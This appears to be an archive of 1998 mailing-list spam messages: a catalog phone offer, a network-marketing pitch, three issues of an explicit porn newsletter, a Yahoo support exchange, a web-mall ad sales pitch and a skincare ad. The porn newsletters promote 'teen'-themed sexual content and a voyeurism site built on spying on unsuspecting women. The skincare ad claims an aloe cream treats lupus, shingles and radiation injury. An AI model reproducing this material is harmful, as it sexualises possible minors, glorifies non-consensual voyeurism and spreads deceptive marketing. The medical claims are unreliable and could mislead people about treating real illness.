No, I'm not exaggerating. This catalog has everything you could possibly want
and they offer new, used or reconditioned items that almost every business uses
each and every day.
 

All the information, the catalog, the names, phone numbers, contacts in one
complete package . You don't even pay postage!

************************************************************************

So how can you take advantage of this risk free offer? 
It's as easy as 1-2-3, here is all you have to do:

Step 1)

Simply call the " Equipment Buyers Guide" at 205-941-4795 
Monday-Friday during regular business hours.    
This offer is ending Friday.  Seriously gang, don't delay.

Step 2)

Tell them you want the "INSIDERS BUYING GUIDE PACKAGE #32" sent to you
immediately.
 
(Make sure you stress you want "PACKAGE #32" as this is the BIG package
 which includes all the key numbers and names .)

Step #3)

After we get the proper mailing information, you'll see it in a day or two!

I know this package will save you and your company hundreds, maybe even 
thousands of dollars.Pick up the phone now and get the INSIDERS BUYERS GUIDE
PACK #32 sent to you now.

------------------------------------------------------------------------
If this message is of no interest to you it is not necessary to reply for
"removal" This is a one time mailing of a very limited offer and 
WILL NOT be sent again.
------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Sat, 7 Feb 1998 03:50:59 -0800 (PST)
Subject: 145 Million
Message-ID: <199801260540.XAA10977@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


Removal instructions below.

If someone with an 8th grade education can make a personal 
fortune of $145 million in network marketing with herbs, 
why can't you?  Especially when this person has just decided 
to come out of retirement to launch an upstart company, 
marketing products that were used by the Russians to win all 
those gold medals at the Olympic Games.  With more scientific 
research than anything else on the market, it's no wonder why 
so many doctors are joining our company and offering these 
products to their patients.

Why not do something different to change your life?  Join in 
with the person who knows how to make things happen big and 
fast.  He has just joined our company and is willing to help 
you learn how to 'set yourself free'.

Someday maybe you can throw the alarm clock out the window.  
For good.

For additional information, please check out the following:
http://www.prime-1.com

Thanks


For guaranteed removal call 1-800-555-9205, ext. 3256,
24 hours a day. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 26 Jan 1998 05:41:05 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Jan 26 '98
Message-ID: <19980126083738.25634.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

PUSSY PARADISE
Yet again Eureka! has managed  to negotiate a special week's
free access  to one of the web' s premier porn sites.  Pussy
Paradise is simply  packed with 100s  of videos (many live),
thousands of photos,  and so much more.  You will  need your
credit card as adult verification but it will not be charged
for your free week! So check it out - there's smut a plenty!
Pussy Paradise .... http://www.pussyparadise.com/eureka.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
The Babe Experience!
http://www.unitedadultsites.com/freesex
Hot site featuring babe pictures, and I mean really
beautiful babe pictures. Also hot phonesex, video and audio
feeds!

UTOPIAN FILTH
Pretty girls get down dirty.  The  horny harlots take you by
the hand and take you  on a tour  of their own  carnal lust.
See their pics,  see their hot bodies entwined.  Clean site,
filthy content.  Nice girls. (When can we shower with them)!
Utopian Filth .......... http://www.firstsightimages.com/uf/

4 BOOBS
It's  not just  for  boob lovers. It's  for  asian, bondage,
group, lesbian, and toy lovers to name just a few. It's easy
to access the different categories, to get to what turns you
on. Plenty of pix, busty boobs included.  Go milk this site.
4 Boobs ............................. http://www.4boobs.com/

CANDID CAMERA
Smile. You're naked, fornicating, and on Candid Camera. This
site would sure be a  ratings  winner if they brought the TV
show back with this  kind of content.  Get your kicks spying
on unsuspecting  chicks with their tits and bits out?  You'd
better believe it.  These  babes  are  surprised  and naked!
Candid Camera ................... http://www.dragonking.com/

FABULOUS FEMALES
Spend some time with  these fabulous females. They've got no
clothes on,  no inhibitions,  and know how to get you horny.
These girls are stunning enough to hold your rigid attention
as you check out their raw strip pix.  Hot site.  Hot girls!
Fabulous Females ................... http://www.sexhost.net/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
20vids+Chat .. http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
MISTY SEX: This sexy lady is from jolly England. Her site is
full of bare ass pictures, kinky  AVIs and nasty wave files.
Her accent will give anyone a  quick  boner! This gal is one
hot commodity, jump on her soon, what could be better than a
little FISH & chips?
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
TeenStories.com: Dozens of  steamy  sex  stories  about teen
sexual experiences! This site is as  hot as they come! Visit
TeenStories.com today! ......... http://www.teenstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?260
Pic  2 --------------------------> http://137.39.63.229/?261
Pic  3 --------------------------> http://137.39.63.229/?262
Pic  4 --------------------------> http://137.39.63.229/?263
Pic  5 --------------------------> http://137.39.63.229/?264
Pic  6 --------------------------> http://137.39.63.229/?265
Pic  7 --------------------------> http://137.39.63.229/?266
Pic  8 --------------------------> http://137.39.63.229/?267
Pic  9 --------------------------> http://137.39.63.229/?268
Pic 10 --------------------------> http://137.39.63.229/?269

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Tue, 27 Jan 1998 10:19:47 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Tue Jan 27 '98
Message-ID: <19980127083701.9129.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Tuesday's issue of Eureka!

FRESHTEENS!
Is there no end to it? Yet again we have succeeded in obtai-
ning a FREE one week trial,  for all Eureka!  subscribers at
another of the net's finest websites. Freshteens offers over
200 video feeds, hot live,  sex shows,  hard XXX movies, hot
XXX stories,  exclusive Texas Teens, and a comprehensive gay
area too. You need a credit card to verify you are an adult,
but will not be charged for your FREE membership. Excellent!
Freshteens ........... http://www.freshteens.com/cproot/1217

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Teen Panties and Masturbation
http://www.yiws.com/a&axxx/warn.htm
Over 200 hot amateur teen pictures showing their panties and
pussy. These hot real amateur pictures are updated daily.
Voted number 2 top teen site on the net 1997.

PHUCK IT
Dedicated to  bringing you a wad  of pumping porn. Give this
man a cigar. There's  plenty of  general depravity  going on
with some really  gorgeous gals  getting serviced hard,  and
enjoying it. Oooh yes. It's not just a smile that's all over
their faces. The girls are hot. Make sure you hose them down
Phuck It ........................... http://www.phuckit.com/

ANIME ZONE
XXX cartoon vixens of the Japanese  doe-eyed,  big breasted,
sure to  sharpen your pencil  variety.  This is  a colourful
site with a  fist full  of free pix  from artists with minds
even dirtier than ours.. Tawdry 'toons are stripped for you.
Anime Zone ............................ http://207.36.65.47/

BIZARRE XXX IMAGES
It's bizarre - you might see triple breasted women. It's XXX
- bottles of beer  and  vegetables are  sure to be swallowed
whole and up close. It's your illustrated photo guide to all
things  jaw-slackeningly odd,  and pant-tighteningly  horny.
Bizarre XXX Images ...... http://www.wawawa.com/bizarre.html

LABORATORY OF PORN
Come on in.  The Mad Scientist awaits you.  He's mixing up a
potion to get your hand in motion. This site's a lot of fun,
and it's not difficult to get to the bottom of it.  Drink in
the elixir of lust  -  amateur,  lesbian, hardcore and more!
Laboratory Of Porn ....... http://209.139.56.98/warning.html

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
20vids+Chat -> http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
PANTY GIRL: For all of you  panty aficionados this site is a
must see. Panty girl models  a  huge  variety of panties, g-
strings, thongs, full back undies,  silk, cotton you name it
she wears them. The best part  is, they are all soaking wet!
That is our favorite kind!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
The Top 50 Erotic  Stories  Sites:  Only the highest quality
erotic stories sites are listed  here. No nonsence. Just top
notch totally free free erotic stories sites................
........................... http://www.xxxstories.com/top50/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?270
Pic  2 --------------------------> http://137.39.63.229/?271
Pic  3 --------------------------> http://137.39.63.229/?272
Pic  4 --------------------------> http://137.39.63.229/?273
Pic  5 --------------------------> http://137.39.63.229/?274
Pic  6 --------------------------> http://137.39.63.229/?275
Pic  7 --------------------------> http://137.39.63.229/?276
Pic  8 --------------------------> http://137.39.63.229/?277
Pic  9 --------------------------> http://137.39.63.229/?278
Pic 10 --------------------------> http://137.39.63.229/?279

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kozmo killah <k0zm0z@yahoo.com>
Date: Tue, 27 Jan 1998 16:29:03 -0800 (PST)
To: InSupport@four11.com
Subject: Re: Response to ticket 012398-6918-403
Message-ID: <19980128002852.16393.rocketmail@send1c.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/html






---InSupport@four11.com wrote:
>
> 
> 
> In response to : 
> 
> 01/23/98-16:40
> 
> Received: from support.four11.com (mail.four11.com [205.180.57.45]) by
> papa.four11.com (8.8.5/8.6.12) with ESMTP id QAA06913 for
> ; Fri, 23 Jan 1998 16:40:19 -0800
> (PST)
> Received: from mta-1a.yahoomail.com (mta-1a.yahoomail.com
> [205.180.60.10]) by support.four11.com (8.8.5/8.6.12) with SMTP id
> QAA08937 for ; Fri, 23 Jan 1998 16:17:02
> -0800 (PST)
> Delivered-To: yahoo.com-abuse@yahoo.com
> Received: from kalypso.iqm.unicamp.br (143.106.51.1)
>   by mta-1a.yahoomail.com with SMTP; 23 Jan 1998 15:51:15 -0800
> Received: (from vazquez@localhost) 
>            by kalypso.iqm.unicamp.br (8.8.8/8.7.3/FreeBSD/2.1.5) id
> VAA11253 
>            for abuse@yahoo.com; Fri, 23 Jan 1998 21:54:11 -0200 (EDT)
> Received: (from sma@localhost) 
>  
> [ Removed... ]
> 
> 
> -----------------------------------------------
> 
> Hello Yahoo! Mail User,
> 
> 
> We have received your message regarding report number 012398-6918-403.
> We are currently investigating the problem. As soon as we have a
> solution for you, we will contact you via e-mail.
> 
> Thank you for helping us improve and enhance our services. We
> appreciate your participation and feedback.
> 
> 
> Regards,
> The Yahoo! Mail Support Team
> 
DO YOU YAHOO!?Get your free @yahoo.com address at Yahoo! Mail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mall@daltek.net
Date: Tue, 27 Jan 1998 16:36:17 -0800 (PST)
To: mall@daltek.net
Subject: Just a Reminder...
Message-ID: <199801272330.RAA04763@cresta.daltek.net>
MIME-Version: 1.0
Content-Type: text/plain


* * * * 
You have been carefully selected to receive the following as a person
obviously interested in this subject based upon your previous internet
postings, or visits to one of our affiliate web sites.  If you have
received this message in error, please accept our apology as a
responsible e-mailer, and reply with the word REMOVE in the subject
line. You will be automatically excluded from future e-mailings. Thank
you for your consideration and help in making the Internet spam-free. 
* * * *

 At your request, we recently sent you our International
 Shopping Mall Complex banner rates for your business.
 
 The following is an update on categories available, and
 several other new options available to fit your expansion plans
 and budget. Please take a look and see what would work best for you.
 We do have a 25% off special introductory offer on our Mini-
 Mirror Store Program, details below.

 PLUS HERE IS SOME EXCITING NEWS..a cutting edge option to be
 offered shortly to our clients. 
 Right now, we are working on adding a program to the Malls 
 that will enable ONLINE PURCHASES TO BE CHARGED TO THE CUSTOMERS' 
 TELEPHONE  BILL. This presents unlimited possibilities for 
 impulse buying, no forms, just click a button...

 Right now, it can be used for items like downloading software,
 and electronic reports and books...But Here is the Big News..it will
 soon be able to work for hard goods!!..Just think about the 
 opportunities here. We will be sending out a full report
 on this in the next week or two in our Client Newsletter.

 Another option available is an item that we can add to your mall
 stores which has proven very successful in increasing sales for any 
 business. We would be glad to send you more information on this,
 just check box below. This has worked well for wholesale, retail,
 manufacturing and is so simple, you will wonder why you haven't
 thought of it before!

 Established in 1994, our award-winning International Shopping
 Complex avgs 1.5 million hits a month in our four
 Mall locations with approx. 300 stores from 29 countries. 
 
 As the Web gets more and more congested, you know that attracting
 qualified buyers to your site gets even more challenging!
 
 You will get tremendous exposure in four shopping locations.
 You could not get a more targeted audience for your products.
 These visitors only come to the Malls to see the shops and are 
 specifically looking in the listed categories for retail, 
 wholesale/mfg or industrial offers.

 The advantages to having four store locations is huge. You will
 get four new URL's to post on all the search engines, and we
 also give you a site address where you can enter each url once only
 and it will automatically send it to 100 directories/search engines,
 giving you 400 new listings right off the bat, (no charge).

 A business that has four or five separate locations definitely 
 establishes you as a serious business. This is the concept
 used by the offline shopping malls that spread from coast to
 coast - new brand names were established and became household
 words.

 What some of our storeowners have accomplished:
 
 One storeowner, after just over a year, grew to 5-figure Internet
 sales, another doubled their sales in just one month, another's
 business grew to over 70% international, an industrial client
 reports great response and sales, wholesalers and mfg. are getting
 distribution for their product lines, another storeowner has built
 a tremendous catalog mail order business, one store introduced a new
 product which started selling the first weekend online...

 Here is what another happy customer wrote last week, on renewing for
 another year with us:
 "You have a great system and it really helps me. You are a valuable and
 indispensable facet of my business."

 CURRENT OPTIONS AND RATES - All rates include installation and 
 ONE FULL YEAR'S RENT - no monthly fees.

 1.MINI-MIRROR SITES - These are very popular for large sites and for
 those who have frequent page updates. We "mirror" (copy) the front
 page of your existing site and install it in the four malls, linking
 back to the rest of your pages. You still have four new URL's. $475.
 SPECIAL THRU FEB.4, 1998...$375.00. (25% Introductory Discount).

 2. NEW! EXCLUSIVE Banner Ads - These are just being offered and some
 categories have already been taken. One banner is offered per
 category directory and includes a " mini-mirror site" also. Inquire
 for availability. $495.00 per category banner, $1500 for all four
 Mall Entrance/ Main Directory also available. Some categories already
 sold out. (See list at end of this message).

 3. FULL MIRROR SITES - If you have an existing site, and want to 
 have four additional full stores in the Malls, we "mirror" (copy)
 your entire, existing site. Again, we have to quote you
 depending on complexity and size, we do also have a size limit.

 4. ORIGINAL STORES - If you do not currently have a web site,
 we can design and install a storefront for you. This is obviously 
 by quote as it depends on how many products, etc. It includes an
 online order form. Basic starts at $795.00. (includes all four locations).

 To receive details on any of the above options, please just 
 fill out the following and email back.  

==========================
I would like information on the Exclusive Banner Ads.
My Product/Service Category is:_____________________ 

Categories: Apparel/Accessories, Arts/Crafts/Antiques, Books/Education,
Collectibles, Home/Garden/Pets, Food, Computer, Cosmetics/Personal Care,
Toys/Games/Hobbies, Health/Fitness, Wholesale/Industrial, Gifts,
Business/Finance, Jewelry, Auto/Boats, Audio/Music/Videos.

SPORTS, TRAVEL, FLOWERS, JEWELRY - ALL FOUR LOCATIONS ARE SOLD OUT
APPAREL, COMPUTER, HEALTH, COSMETICS...3 each still available.
This applies to banners only of course, you can still have mirror
sites in any category.


My http:// is _______________________________

==========================
 I would like a quote on an:
 
 Original Store ( )

 Full Mirror ( ) My Site Address is: http://_________________________

========================
 I am interested in the 25% OFF mini-mirrors SPECIAL INTRODUCTORY
 OFFER, (Note: good thru February 1, 1998 only) My site address is:

 http://_________________________

 Note: We do not accepted x-rated sites.

 ALSO PLEASE CHECK HERE IF YOU WOULD LIKE INFORMATION ON
 THE OPTION MENTIONED IN PARAGRAPH THREE. (  )

Thank you for your interest.
================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Wed, 28 Jan 1998 01:19:19 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Wed Jan 28 '98
Message-ID: <19980128082018.19356.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Wednesday's issue of Eureka!

PLAYGAL
This is truly a breathtaking site. Well-designed and easy to
use with  excellent content.  The tour alone has hotter porn
than many other 'free' sites - go see it now. It's explicit,
comprehensive and top quality.  There are 2,000  video feeds
online, free live fucking with sound, 10,000 erotic stories,
1,000s of top quality pix, adult and arcade games, real ama-
teur competitions and much more. Click now and be astounded!
Playgal .... http://www.playgal.com/playgal/banner_abc1.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
James And Victoria's Erotic Site
http://www.jamesandvictoria.com/ads/ads.cgi?advert=eureka
Our free site has hundreds of photos, thousands of erotic
stories, personal ads and several chat rooms.

NUMB NUTS
These guys have got  more  than  just  free hot hardcore XXX
pix. A  picture post,  live sex shows and  live chat is just
part of their plans to  get your nuts numb  (thru over use).
It's a heaving sack of horny sex.  You'd be nuts to miss it!
Numb Nuts ......................... http://www.numbnuts.com/

HERMITAGE
There's  plenty  of   thumbnailed   asian  beauties  looking
winsome, innocent, and  most  importantly,  naked. These are
pix of pretty girls  in  a  pretty  pink  site. Pretty much,
you'll be sure to fall in love.  The girls  just shine thru!
Hermitage ....... http://www2.gol.com/users/able/nudfot1.htm

HUMPIN AND PUMPIN
Mature women, teen temptresses,  they're  all  coming out of
the woodwork. However you like your horny naked babes you'll
find them here. There's a vast selection of sexy chicks with
bedroom eyes,  wearing a saucy grin.  Essential ass  on tap.
Humpin and Pumpin ............ http://www.luvgun.com/pumpin/

PINK LOLLIPOP
There's plenty to suck on  and  see.  With  free XXX pix and
even some  sound  files.  The  web  masters  even  want your
comments to improve it. Hey  boys!  You're  doing a good job
with nice pix, and hot categories.  Keep it up - so will we!
Pink Lollipop ................. http://www.pinklollipop.com/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Just 18 -----------------------> http://204.244.215.7/teens/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
SUMMER: A hot 18  year  old  with  the  body  and  face of a
goddess, Summer is  the  epitome  of  SEX.  Her eyes enchant
everyone she gazes upon. She  also sports a world-class ass,
one of the best on  the  net.  Let  Summer  keep you warm on
these cold winter nights!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Amateur Women Stories:  AmateurWomen.com  brings you totally
hot true sex stories and  real  pics  of hot amatuer models.
See and read what these hot honeys do in private! ..........
............................... http://www.amateurwomen.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?280
Pic  2 --------------------------> http://137.39.63.229/?281
Pic  3 --------------------------> http://137.39.63.229/?282
Pic  4 --------------------------> http://137.39.63.229/?283
Pic  5 --------------------------> http://137.39.63.229/?284
Pic  6 --------------------------> http://137.39.63.229/?285
Pic  7 --------------------------> http://137.39.63.229/?286
Pic  8 --------------------------> http://137.39.63.229/?287
Pic  9 --------------------------> http://137.39.63.229/?288
Pic 10 --------------------------> http://137.39.63.229/?289

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kozmo killah <k0zm0z@yahoo.com>
Date: Wed, 28 Jan 1998 11:00:48 -0800 (PST)
To: Greg Lehey <grog@lemis.com>
Subject: Re: Response to ticket 012398-6918-403
Message-ID: <19980128190013.19584.rocketmail@send1a.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/html


this keeps being sent to me??!

over and over from four11.com, what gives?




---Greg Lehey  wrote:
>
> On Tue, Jan 27, 1998 at 04:28:52PM -0800, kozmo killah wrote:
> 
> (sorry, can't include HTML)
> 
> *Please* don't send messages in HTML.  Most people can't read them.
> 
> Why did you send this message to -mobile anyway?
> 
> Greg
> 
DO YOU YAHOO!?Get your free @yahoo.com address at Yahoo! Mail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@mda.net
Date: Fri, 30 Jan 1998 00:29:49 -0800 (PST)
To: Friend@public.com
Subject: PRO2H PRODUCTS - NATURAL SKIN WEAR
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
IF YOU WISH TO BE REMOVED FROM THE MAILING LIST
PLEASE E-MAIL TO:  remove@mda.net AND PUT REMOVE 
IN THE SUBJECT HEADER.  THANK YOU.////////////////
/////////////////////////////////////////////////////////

	PRO 2H PRODUCTS


	NATURAL SKIN WEAR - 100% MONEY BACK GUARANTEE!!!


SKINWEAR:The Hottest Ingredients, The Latest Technology Let Pro 2H 


Products introduce you to a world of new product innovations that have 


enjoyed immediate commercial success.  Pro 2H proudly introduces 


SKINWEAR - a high performance, botanical skincare line that blends the
hottest ingredients with the latest technology.  These are products that
address the needs of today's cosmetic buyer by providing product choices
to help counteract the effects of sun damage, aging, pollution, wind,
severe temperatures and much, much, more.
		ENVIRONMENTALLY RESPONSIBLE
In today's rapidly changing world, we are confronted with the challenge
of balancing creativity and environmental responsibility.  Pro 2H Product's
environmental stance has sparked the development of product innovations
that will help meet tomorrow's environmental goals head on.  Use of recyclable
containers, natural ingredients and the continuing committment by our staff 
never to test on animals are just a few of the environmentallysound programs
we are committed to.  
We are known throughout the industry for our integrity, reliability and product 
superiority.  We deliver products and services that meet the changing needs of 
our customers, that is what gives us a distinct advantage over our competitors.
Now more than ever, we've got what it takes to help achieve beautiful, radiant, 
younger-looking skin.


INTRODUCING........Pro ALPHA H2


Pro ALPHA H2 is a scientific breakthrough formula containing a combination of 
ALPHA HYDROXY Fruit Acids including Glycolic Acid-derived from apples,sugar 
cane and citrus. Green Tea Leaves Extract helps to reduce irritation associated with 
Alpha Hydroxy Acids.  This natural fruit acid complex works with your skin's natural renewal processes to help achieve healthier, younger



looking skin.

		COMMON USES:


*  Sun Damaged Skin		*  Age Spots

*  Uneven Pigmentation		*  Blemishes
*  Premature Aging		*  Wrinkles


*  Rough Dry Patches		*  Smooth Fine Lines
	THE BEAUTY OF ALPHA H2


*This natural fruit acid complex works with your natural process to help
achieve healthier, younger-looking skin.


*Green Tea Leaves Extract helps to reduce irritation associated with Alpha Hydroxy


*Helps increase skin's own ability to absorb and retain moisture.
*Promotes natural exfoliation by removing dry, lifeless cells from skin's outer layer.
*Helps protect new healthy skin cells against free radical and damaging environmental effects.


*Retexturize - increaing clarity, firmness, elasticity and evenness in skin tone.


*Leaves skin feeling clean, freah, and healthy.


*Absorbs quickley with no greasy residue.


	INTRODUCING PRO BEMA 2H


Pro BEMA2H is a new blend of natural botanical ingredients and contains the 


world's most effective Aloe Vera extract.


TREATS:


*  Acne		*  Abrasions		*  Athlete's Foot


*  Allergic Rash	*  Burns			*  Bed Sores


*  Bee Stings	*  Bruises		*  Blisters


*  Boils		*  Chapped Skin	*  Chapped Lips


*  Cradle Cap	*  Chemical Peel	*  Diaper Rash


*  Dermabrassion*  Dermatitis		*  Dry Skin


*  Eczema	*  Flea Bites		*  Fungus


*  Fever Blisters	*  Hives			*  Insect Bites
*  Itching	*  Impetigo		*  Jock Itch


*  Keratosis	*  Lupus		*  Psoriasis


*  Poison Ivy	*  Poison Oak		*  Razor Burns


*  Rashes	*  Radiation		*  Rosacea


*  Shingles	*  Burns		*  Stretch Marks


*  Sunburn	*  Wind Burns	*  Very Dry Skin


*  Stops itching caused by poison oak, poison ivy, insect bites and rashes.
*  Instantly stops pain from cuts, scrapes, burns and sunburn, without peeling.
*  Heals athlete's foot and other fungus.
*  16 Hour moisturizer.
*  Excellent skin softener, it protects against environmental pollutants.


*  Helps guard against the effects of exposure to sun and wind.


*  Great for baby's skin for rashes, dry patches.
REVOLUTIONARY NEW FORMULA


Aloe Vera Skin Healing Creme
Never before has there been a more complete combination of ingredients along with a
16 hour moisturizer as in ProBema 2H without the use of dyes, water, mineral oil, 
cortisone creams, steroids, animal by-products and absolutely no animal testing.  The 
Aloe Vera used in ProBema 2H is Barbadensis Millers Aloe from the island of Barbados.
This is the strongest and most effective aloe vera in the world.
		NEW!	NEW!	NEW!	


	ProGel AH2  BIOBATH and SHOWER GEL


Alpha Hydroxy Skin Softeneing Complex and Vitamin Beads an ultra mild body 
treatment that cleanses and moisturizes without the drying effects of soap.  Enhanced
with Aloe Vera Gel and Panthenol to add moisture.  Golden beads of vitamins A and E
to condition and help increase skin's elasticity and suppleness.  Enhanced with 
invigorating, aromathreapy botanicals and Alpha Hydroxy Complex to leave your body
silky, refreshed, and revitalized. ph balanced.
	*  Soap-free, non-drying formula
	*  Contains Alpha Hydroxy-based skin softeneing complex


	*  Refreshing aromatic fragrance


KEY INGREDIENTS:  Vitamin A and E Beads, Alpha Hydroxy based skin softening 
complex, Panthenol, Aloe Vera Gel, Aromatherapy Botanical Extracts of Peach, 
Passion Fruit, Apricot and Mango.
METHOD OF USE: 


In the Shower:  Lather on moist skin, or apply to damp wash cloth, sponge or loofah,
massage and rinse. For the Bath:  Pour under warm running water for a luxurious, 
scented bubble bath.
	100% MONEY BACK GUARANTEE!!!


